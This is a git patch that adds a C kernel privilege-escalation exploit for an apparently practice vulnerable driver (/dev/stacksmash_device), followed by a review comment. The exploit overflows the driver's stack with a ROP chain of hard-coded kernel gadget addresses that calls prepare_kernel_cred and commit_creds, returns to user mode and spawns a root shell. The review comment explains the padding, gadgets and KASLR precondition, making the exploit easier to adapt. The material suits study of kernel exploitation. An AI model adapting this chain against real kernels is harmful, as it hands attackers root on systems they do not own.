From befe99ac8710226a70cb1a5db23c0022192cafc6 Mon Sep 17 00:00:00 2001
From: Jack Ren
Date: Thu, 19 Sep 2024 20:30:20 +0800
Subject: [PATCH] Added exploit for KROP_LPE
---
 ROP/KROP_LPE/stacksmash_exploit.c | 69 +++++++++++++++++++++++++++++++
 1 file changed, 69 insertions(+)
 create mode 100644 ROP/KROP_LPE/stacksmash_exploit.c
diff --git a/ROP/KROP_LPE/stacksmash_exploit.c b/ROP/KROP_LPE/stacksmash_exploit.c
new file mode 100644
index 0000000..a66eec0
--- /dev/null
+++ b/ROP/KROP_LPE/stacksmash_exploit.c
@@ -0,0 +1,69 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define DEVICE_NAME "/dev/stacksmash_device"
+
+int64_t user_cs, user_rflags, user_rsp, user_ss;
+
+void save_registers() {
+ asm("movq %%cs, %[user_cs]\n"
+ "movq %%ss, %[user_ss]\n"
+ "movq %%rsp, %[user_rsp]\n"
+ "pushfq\n"
+ "popq %[user_rflags]\n"
+ : [user_cs] "=r"(user_cs), [user_ss] "=r"(user_ss),
+ [user_rsp] "=r"(user_rsp), [user_rflags] "=r"(user_rflags));
+}
+
+void shell() { system("/bin/sh"); }
+
+int main(int argc, char **argv) {
+ save_registers();
+ int ret, fd;
+ uint64_t payload[] = {
+ 0x1,
+ 0x2,
+ 0x3,
+ 0x4,
+ 0x5,
+ 0xffffffff8103fb8d, /* pop rdi; ret */
+ 0x0,
+ 0xffffffff810c5900, /* prepare_kernel_cred */
+ 0xffffffff813db97a, /* pop rcx; ret */
+ 0x0,
+ 0xffffffff81b1d5cf, /* mov rdi, rax ; xor eax, eax ; rep movsb byte ptr
+ [rdi], byte ptr [rsi] ; ret */
+ 0xffffffff810c5490, /* commit_creds */
+ 0xffffffff81c00f50 +
+ 22, /* swapgs_restore_regs_and_return_to_usermode + 22 */
+ 0x0, /* Extra rax */
+ 0x0, /* Extra rdi */
+ (uint64_t)shell, /* rip */
+ user_cs,
+ user_rflags,
+ user_rsp,
+ user_ss};
+
+ fd = open(DEVICE_NAME, O_RDWR);
+ if (fd < 0) {
+ puts("Failed to open device\n");
+ return (-1);
+ }
+ ret = write(fd, payload, sizeof(payload));
+ if (ret < 0) {
+ puts("Failed to write to device\n");
+ return (-1);
+ }
+
+ return (0);
+ }
+
+// https://github.com/pr0cf5/kernel-exploit-practice/tree/master/return-to-user
+// https://tttang.com/archive/1606/#toc_version-1-trampoline-goes-weeeh
+// https://www.yijinglab.com/specialized/20230704083315
+// https://bbs.kanxue.com/thread-276403.htm
\ No newline at end of file
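Review bot: The kernel addresses in `payload` (`0xffffffff8103fb8d` for `pop rdi; ret`, `0xffffffff810c5900` for `prepare_kernel_cred`, `0xffffffff81c00f50 + 22` for the KPTI return trampoline, and the rest) are fixed kernel-text addresses with no KASLR handling and no note of which kernel image they were extracted from, and a mismatch will crash the target kernel rather than fail gracefully; a header comment such as `/* Gadget and symbol addresses are for one specific kernel build booted with KASLR disabled (nokaslr); re-extract them for any other image. */` would make that precondition explicit. The leading `0x1`…`0x5` qwords and the `pop rcx; ret` / `0x0` pair are likewise unexplained — the former presumably pad the overflow up to the saved return address, and the latter appears to zero rcx so the `rep movsb` inside the `mov rdi, rax` gadget copies nothing — and each deserves a one-line comment naming its purpose. A smaller style point: `puts` already appends a newline, so the `\n` in `"Failed to open device\n"` and `"Failed to write to device\n"` prints a blank line; `perror("open")` / `perror("write")` would also report why the syscall failed.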